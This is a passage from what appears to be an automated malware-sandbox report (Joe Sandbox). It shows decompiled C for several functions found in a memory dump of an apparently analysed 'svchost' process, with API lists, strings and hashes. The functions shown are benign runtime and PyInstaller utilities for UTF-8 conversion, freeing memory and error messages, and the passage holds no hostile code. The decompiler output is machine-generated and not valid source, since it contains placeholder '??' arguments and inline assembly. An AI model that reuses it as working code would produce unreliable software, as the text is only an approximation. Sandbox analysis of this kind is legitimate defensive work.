						_t41 = _t31;
						_t21 =  *(_t47 + 0x20) - _t31;
						__eflags = _t21;
						 *(_t47 + 0x20) = _t21;
						while(1) {
							_t22 =  *(_t21 + _t41);
							 *(_t47 + 0x28) = _t22;
							_t45 = MultiByteToWideChar(0xfde9, 0, _t22, 0xffffffff, 0, 0);
							__eflags = _t45;
							if(__eflags == 0) {
								break;
							}
							_t7 = _t45 + 1; // 0x1
							_push(2);
							_push(_t7);
							_t28 = E00BC97F8(_t7);
							_t47 = _t47 + 8;
							 *(_t47 + 0x14) = _t28;
							__eflags = _t28;
							if(__eflags == 0) {
								_push("Out of memory.");
								_push("win32_utils_from_utf8");
								goto L13;
							} else {
								__eflags = MultiByteToWideChar(0xfde9, 0,  *(_t47 + 0x1c), 0xffffffff, _t28, _t45);
								if(__eflags == 0) {
									_push("Failed to decode wchar_t from UTF-8\n");
									L12:
									_push("MultiByteToWideChar");
									L13:
									E00BC1860(_t34, __eflags);
									_t48 = _t47 + 8;
									 *_t41 = 0;
									_t42 = 0;
									__eflags = _t36;
									if(_t36 >= 0) {
										do {
											L00BC9803(_t31[_t42]);
											_t42 = _t42 + 1;
											_t48 = _t48 + 4;
											__eflags = _t42 - _t36;
										} while (_t42 <= _t36);
									}
									L00BC9803(_t31);
									__eflags = 0;
									return 0;
								} else {
									_t36 =  &(_t36[0]);
									_t44 =  *(_t47 + 0x1c);
									 *_t41 =  *(_t47 + 0x14);
									_t41 =  &(_t41[1]);
									__eflags = _t36 - _t44;
									if(_t36 >= _t44) {
										goto L17;
									} else {
										_t21 =  *(_t47 + 0x20);
										continue;
									}
								}
							}
							goto L18;
						}
						_push("Failed to get wchar_t buffer size.\n");
						goto L12;
					}
				} else {
					return _t18;
				}
				L18:
			}

















                            0x00bc4d40
                            0x00bc4d45
                            0x00bc4d49
                            0x00bc4d4e
                            0x00bc4d4f
                            0x00bc4d54
                            0x00bc4d56
                            0x00bc4d5b
                            0x00bc4d65
                            0x00bc4d67
                            0x00bc4d69
                            0x00bc4e43
                            0x00bc4e45
                            0x00bc4e53
                            0x00bc4d6f
                            0x00bc4d73
                            0x00bc4d75
                            0x00bc4d75
                            0x00bc4d77
                            0x00bc4d80
                            0x00bc4d80
                            0x00bc4d91
                            0x00bc4d9b
                            0x00bc4d9d
                            0x00bc4d9f
                            0x00000000
                            0x00000000
                            0x00bc4da1
                            0x00bc4da4
                            0x00bc4da6
                            0x00bc4da7
                            0x00bc4dac
                            0x00bc4daf
                            0x00bc4db3
                            0x00bc4db5
                            0x00bc4def
                            0x00bc4df4
                            0x00000000
                            0x00bc4db7
                            0x00bc4dcc
                            0x00bc4dce
                            0x00bc4de8
                            0x00bc4e00
                            0x00bc4e00
                            0x00bc4e05
                            0x00bc4e05
                            0x00bc4e0a
                            0x00bc4e0d
                            0x00bc4e13
                            0x00bc4e15
                            0x00bc4e17
                            0x00bc4e20
                            0x00bc4e23
                            0x00bc4e28
                            0x00bc4e29
                            0x00bc4e2c
                            0x00bc4e2c
                            0x00bc4e20
                            0x00bc4e31
                            0x00bc4e39
                            0x00bc4e42
                            0x00bc4dd0
                            0x00bc4dd4
                            0x00bc4dd5
                            0x00bc4dd9
                            0x00bc4ddb
                            0x00bc4dde
                            0x00bc4de0
                            0x00000000
                            0x00bc4de2
                            0x00bc4de2
                            0x00000000
                            0x00bc4de2
                            0x00bc4de0
                            0x00bc4dce
                            0x00000000
                            0x00bc4db5
                            0x00bc4dfb
                            0x00000000
                            0x00bc4dfb
                            0x00bc4d62
                            0x00bc4d62
                            0x00bc4d62
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00BC3951,?,00000000,00BC3951,?), ref: 00BC4D95
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BC4DC6
                            Strings
                            • win32_utils_from_utf8, xrefs: 00BC4DF4
                            • Failed to decode wchar_t from UTF-8, xrefs: 00BC4DE8
                            • Failed to get wchar_t buffer size., xrefs: 00BC4DFB
                            • Out of memory., xrefs: 00BC4DEF
                            • MultiByteToWideChar, xrefs: 00BC4E00
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 626452242-306716450
                            • Opcode ID: b3573bf4c4e7b8f9ecc88eb43def07850e1e97b5e526299cc39971abc61b2bab
                            • Instruction ID: cf3def644b206bb238328fd3874dd2d9a3446437fa9dae6841cab5b85c1d0b44
                            • Opcode Fuzzy Hash: b3573bf4c4e7b8f9ecc88eb43def07850e1e97b5e526299cc39971abc61b2bab
                            • Instruction Fuzzy Hash: 9F318975644306ABD7206F98AC82F6A77D4FB40711F5009BEFD54A72C1EBB6DA0483A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD534A, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00BD534A(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00BD369E(_t29, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00BD0A25(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E00BCC998(GetLastError());
								}
							}
							E00BD09EB(_t40);
							_t14 = _t35;
						} else {
							E00BCC998(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00BCC9CE())) = 0x16;
						E00BD1788();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
				E00BD1788();
				return 0;
			}















                            0x00bd534f
                            0x00bd5354
                            0x00bd536e
                            0x00bd5371
                            0x00bd5373
                            0x00bd538c
                            0x00bd538e
                            0x00bd5395
                            0x00bd5397
                            0x00bd53a0
                            0x00bd53a1
                            0x00bd53a5
                            0x00bd53ab
                            0x00bd53ae
                            0x00bd53b0
                            0x00bd53ca
                            0x00bd53cd
                            0x00bd53cf
                            0x00bd53dc
                            0x00bd53e2
                            0x00bd53e4
                            0x00bd53f8
                            0x00bd53fa
                            0x00bd53fe
                            0x00bd53fe
                            0x00bd53ff
                            0x00bd53e6
                            0x00bd53ed
                            0x00bd53f2
                            0x00bd53e4
                            0x00bd5402
                            0x00bd5407
                            0x00bd53b2
                            0x00bd53b9
                            0x00bd53be
                            0x00bd53be
                            0x00bd5375
                            0x00bd537a
                            0x00bd5380
                            0x00bd5385
                            0x00bd5385
                            0x00000000
                            0x00bd540c
                            0x00bd535b
                            0x00bd5361
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5d496da00d05b00d685c724ae7b097f20b7ef6cf87ccefa8f7b67ef8f595670
                            • Instruction ID: 9c514c1f68b48b2b0c038c5a350ed9ae3245a527de983abca79bc07780d23082
                            • Opcode Fuzzy Hash: f5d496da00d05b00d685c724ae7b097f20b7ef6cf87ccefa8f7b67ef8f595670
                            • Instruction Fuzzy Hash: C211E472514618BBCB213F799C44E6BBBECEB81770B2006AAF816C7341FA7089418671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD7F23, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD7F23(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00BD7EE7(_t45, 7);
					E00BD7EE7(_t45 + 0x1c, 7);
					E00BD7EE7(_t45 + 0x38, 0xc);
					E00BD7EE7(_t45 + 0x68, 0xc);
					E00BD7EE7(_t45 + 0x98, 2);
					E00BD09EB( *((intOrPtr*)(_t45 + 0xa0)));
					E00BD09EB( *((intOrPtr*)(_t45 + 0xa4)));
					E00BD09EB( *((intOrPtr*)(_t45 + 0xa8)));
					E00BD7EE7(_t45 + 0xb4, 7);
					E00BD7EE7(_t45 + 0xd0, 7);
					E00BD7EE7(_t45 + 0xec, 0xc);
					E00BD7EE7(_t45 + 0x11c, 0xc);
					E00BD7EE7(_t45 + 0x14c, 2);
					E00BD09EB( *((intOrPtr*)(_t45 + 0x154)));
					E00BD09EB( *((intOrPtr*)(_t45 + 0x158)));
					E00BD09EB( *((intOrPtr*)(_t45 + 0x15c)));
					return E00BD09EB( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                            0x00bd7f29
                            0x00bd7f2e
                            0x00bd7f37
                            0x00bd7f42
                            0x00bd7f4d
                            0x00bd7f58
                            0x00bd7f66
                            0x00bd7f71
                            0x00bd7f7c
                            0x00bd7f87
                            0x00bd7f95
                            0x00bd7fa3
                            0x00bd7fb4
                            0x00bd7fc2
                            0x00bd7fd0
                            0x00bd7fdb
                            0x00bd7fe6
                            0x00bd7ff1
                            0x00000000
                            0x00bd8001
                            0x00bd8006

                            APIs
                              • Part of subcall function 00BD7EE7: _free.LIBCMT ref: 00BD7F10
                            • _free.LIBCMT ref: 00BD7F71
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD7F7C
                            • _free.LIBCMT ref: 00BD7F87
                            • _free.LIBCMT ref: 00BD7FDB
                            • _free.LIBCMT ref: 00BD7FE6
                            • _free.LIBCMT ref: 00BD7FF1
                            • _free.LIBCMT ref: 00BD7FFC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction ID: 63f9fc22c0b94d94932f4f06dc004502d8ccbe256d5072f0950a5feac83b5c62
                            • Opcode Fuzzy Hash: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction Fuzzy Hash: A6110A71595B14ABE620FBB1CC17FCBF7DCAF04700F404C9AB299A6692FA79AD048750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4BF0, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 61COMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E00BC4BF0(short* _a4, char* _a8, int _a12) {
				void* _t17;
				void* _t18;
				int _t19;
				short* _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 != 0) {
					_t19 = _a12;
					goto L6;
				} else {
					_t19 = MultiByteToWideChar(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20);
					_t26 = _t19;
					if(_t19 != 0) {
						_t3 = _t19 + 1; // 0x1
						_push(2);
						_t20 = E00BC97F8(_t17);
						_t21 = _t21 + 8;
						__eflags = _t20;
						if(__eflags != 0) {
							L6:
							__eflags = MultiByteToWideChar(0xfde9, 0, _a8, 0xffffffff, _t20, _t19);
							if(__eflags != 0) {
								return _t20;
							} else {
								_push("Failed to decode wchar_t from UTF-8\n");
								_push("MultiByteToWideChar");
								E00BC1860(_t18, __eflags);
								__eflags = 0;
								return 0;
							}
						} else {
							_push("Out of memory.");
							_push("win32_utils_from_utf8");
							E00BC1860(_t18, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Failed to get wchar_t buffer size.\n");
						_push("MultiByteToWideChar");
						E00BC1860(_t18, _t26);
						return 0;
					}
				}
			}








                            0x00bc4bf1
                            0x00bc4bf8
                            0x00bc4c56
                            0x00000000
                            0x00bc4bfa
                            0x00bc4c0e
                            0x00bc4c10
                            0x00bc4c12
                            0x00bc4c2b
                            0x00bc4c2e
                            0x00bc4c36
                            0x00bc4c38
                            0x00bc4c3b
                            0x00bc4c3d
                            0x00bc4c5a
                            0x00bc4c6f
                            0x00bc4c71
                            0x00bc4c8e
                            0x00bc4c73
                            0x00bc4c73
                            0x00bc4c78
                            0x00bc4c7d
                            0x00bc4c85
                            0x00bc4c89
                            0x00bc4c89
                            0x00bc4c3f
                            0x00bc4c3f
                            0x00bc4c44
                            0x00bc4c49
                            0x00bc4c51
                            0x00bc4c55
                            0x00bc4c55
                            0x00bc4c14
                            0x00bc4c14
                            0x00bc4c19
                            0x00bc4c1e
                            0x00bc4c2a
                            0x00bc4c2a
                            0x00bc4c12

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                              • Part of subcall function 00BC1860: GetLastError.KERNEL32(?,?), ref: 00BC187D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C69
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 1717984340-306716450
                            • Opcode ID: 94fde37c0acfb2bea194dfc72c29d4d3dca53d2e34c2ce7051aed6e809236a18
                            • Instruction ID: 0f5666ed8565fd6910a493a183fe2ced2d21f2b85ba9a236777cddc58a8b152f
                            • Opcode Fuzzy Hash: 94fde37c0acfb2bea194dfc72c29d4d3dca53d2e34c2ce7051aed6e809236a18
                            • Instruction Fuzzy Hash: 4501613B74926132C620756F7C1AF8B26C4CFC1772F250AA9F914F21E2D760C90641F2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4860, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 46windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E00BC4860(void* __edx, signed int _a8192, long _a8200) {
				short _v0;
				signed int _t8;
				long _t10;
				long _t11;
				void* _t24;
				signed int _t26;

				_t24 = __edx;
				E00BC7880();
				_t8 =  *0xbec008; // 0xdc55bb75
				_a8192 = _t8 ^ _t26;
				_t10 = _a8200;
				if(_t10 == 0) {
					_t10 = GetLastError();
				}
				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0);
				_t32 = _t11;
				if(_t11 != 0) {
					__eflags = E00BC4C90(0xbf4a58,  &_v0, 0x1000);
					_t19 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					_t14 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					__eflags = _a8192 ^ _t26 + 0x0000000c;
					E00BC786A();
					return  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
				} else {
					_push("No error messages generated.\n");
					_push("FormatMessageW");
					E00BC1860(_t24, _t32);
					E00BC786A();
					return "PyInstaller: FormatMessageW failed.";
				}
			}









                            0x00bc4860
                            0x00bc4865
                            0x00bc486a
                            0x00bc4871
                            0x00bc4878
                            0x00bc4881
                            0x00bc4883
                            0x00bc4883
                            0x00bc48a2
                            0x00bc48a8
                            0x00bc48aa
                            0x00bc48f4
                            0x00bc48fb
                            0x00bc48fe
                            0x00bc4907
                            0x00bc4909
                            0x00bc4914
                            0x00bc48ac
                            0x00bc48ac
                            0x00bc48b1
                            0x00bc48b6
                            0x00bc48cc
                            0x00bc48d7
                            0x00bc48d7

                            APIs
                            • GetLastError.KERNEL32(00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC4883
                              • Part of subcall function 00BC4C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC48A2
                            Strings
                            • PyInstaller: FormatMessageW failed., xrefs: 00BC48BE
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00BC48EF
                            • No error messages generated., xrefs: 00BC48AC
                            • FormatMessageW, xrefs: 00BC48B1
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3268588819
                            • Opcode ID: 79ef3ce4417318f701a17545daf031b251ca31d6fc0ef810f8558b501ab9a8a3
                            • Instruction ID: cccf77c7ea2987186795681d30ab65b60c4e6ee22a1ca252778115d5b296ea72
                            • Opcode Fuzzy Hash: 79ef3ce4417318f701a17545daf031b251ca31d6fc0ef810f8558b501ab9a8a3
                            • Instruction Fuzzy Hash: 110188717943806BF718D7199C9BFAA32D5EB48741F4044ACB749CA1D2FB709844C757
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD8F51, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E00BD8F51(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xbec008; // 0xdc55bb75
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E00BDCA63(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E00BC786A();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E00BD815E(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00BD3980(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E00BD815E(_t99);
									goto L36;
								}
								_t60 = E00BD3980(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E00BD815E(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00BD0A25(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E00BDF250();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00BD3980(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00BD0A25(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00BDF250();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                            0x00bd8f56
                            0x00bd8f57
                            0x00bd8f58
                            0x00bd8f5f
                            0x00bd8f64
                            0x00bd8f6a
                            0x00bd8f70
                            0x00bd8f76
                            0x00bd8f79
                            0x00bd8f79
                            0x00bd8f7c
                            0x00bd8f7e
                            0x00bd8f7e
                            0x00bd8f7c
                            0x00bd8f80
                            0x00bd8f85
                            0x00bd8f8c
                            0x00bd8f8f
                            0x00bd8f8f
                            0x00bd8fab
                            0x00bd8fb1
                            0x00bd8fb6
                            0x00bd9149
                            0x00bd9154
                            0x00bd915c
                            0x00bd8fbc
                            0x00bd8fbc
                            0x00bd8fbf
                            0x00bd8fc4
                            0x00bd8fc8
                            0x00bd901c
                            0x00bd901c
                            0x00bd901e
                            0x00bd9020
                            0x00bd913e
                            0x00bd913e
                            0x00bd9140
                            0x00bd9141
                            0x00bd9147
                            0x00000000
                            0x00bd9147
                            0x00bd9031
                            0x00bd9037
                            0x00bd9039
                            0x00000000
                            0x00000000
                            0x00bd903f
                            0x00bd9051
                            0x00bd9056
                            0x00bd905a
                            0x00000000
                            0x00000000
                            0x00bd9067
                            0x00bd90a1
                            0x00bd90a4
                            0x00bd90a7
                            0x00bd90a9
                            0x00bd90ab
                            0x00bd90ad
                            0x00bd90f9
                            0x00bd90f9
                            0x00bd90fb
                            0x00bd90fb
                            0x00bd90fd
                            0x00bd9137
                            0x00bd9138
                            0x00000000
                            0x00bd913d
                            0x00bd9111
                            0x00bd9116
                            0x00bd9118
                            0x00000000
                            0x00000000
                            0x00bd911c
                            0x00bd911d
                            0x00bd911e
                            0x00bd9121
                            0x00bd915d
                            0x00bd9160
                            0x00bd9123
                            0x00bd9123
                            0x00bd9124
                            0x00bd9124
                            0x00bd9131
                            0x00bd9133
                            0x00bd9135
                            0x00bd9166
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd9135
                            0x00bd90af
                            0x00bd90b2
                            0x00bd90b4
                            0x00bd90b6
                            0x00bd90b8
                            0x00bd90bb
                            0x00bd90c0
                            0x00bd90db
                            0x00bd90dd
                            0x00bd90e7
                            0x00bd90e9
                            0x00bd90ea
                            0x00bd90ec
                            0x00000000
                            0x00000000
                            0x00bd90ee
                            0x00bd90f4
                            0x00bd90f4
                            0x00000000
                            0x00bd90f4
                            0x00bd90c2
                            0x00bd90c4
                            0x00bd90c8
                            0x00bd90cd
                            0x00bd90cf
                            0x00bd90d1
                            0x00000000
                            0x00000000
                            0x00bd90d3
                            0x00000000
                            0x00bd90d3
                            0x00bd9069
                            0x00bd906e
                            0x00000000
                            0x00000000
                            0x00bd9074
                            0x00bd9076
                            0x00000000
                            0x00000000
                            0x00bd9092
                            0x00bd9096
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd909c
                            0x00bd8fcf
                            0x00bd8fd1
                            0x00bd8fd3
                            0x00bd8fdb
                            0x00bd8ffa
                            0x00bd8ffc
                            0x00bd9006
                            0x00bd9008
                            0x00bd9009
                            0x00bd900b
                            0x00000000
                            0x00000000
                            0x00bd9011
                            0x00bd9017
                            0x00bd9017
                            0x00000000
                            0x00bd9017
                            0x00bd8fdf
                            0x00bd8fe3
                            0x00bd8fe8
                            0x00bd8fec
                            0x00000000
                            0x00000000
                            0x00bd8ff2
                            0x00000000
                            0x00bd8ff2

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BCC00D,00BCC00D,?,?,?,00BD91A2,00000001,00000001,DEE85006), ref: 00BD8FAB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD91A2,00000001,00000001,DEE85006,?,?,?), ref: 00BD9031
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,DEE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD912B
